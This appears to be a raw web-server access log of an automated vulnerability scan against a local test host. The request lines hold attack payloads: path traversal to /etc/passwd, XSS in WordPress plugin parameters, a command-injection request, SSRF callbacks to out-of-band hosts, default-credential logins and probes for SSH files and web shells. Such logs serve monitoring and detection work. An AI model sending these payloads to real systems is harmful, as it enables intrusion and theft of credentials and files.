"03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET @c9oms3gsmpve1ijt0mc0agffp47nhqpq6.oast.live/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET c9oms3gsmpve1ijt0mc0i9fhyscbcd3a6.oast.live:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.429","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.463","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.471","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.438","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.473","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://c9oms3gsmpve1ijt0mc05um7kso89qxnu.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.949","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.440","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.977","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.450","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.449","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts.old HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.467","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.505","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.087","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /EMSWebClient/Login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/emq.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.518","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.472","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.485","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.473","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.511","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.534","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.514","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.475","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.480","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.505","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.844","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:27 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA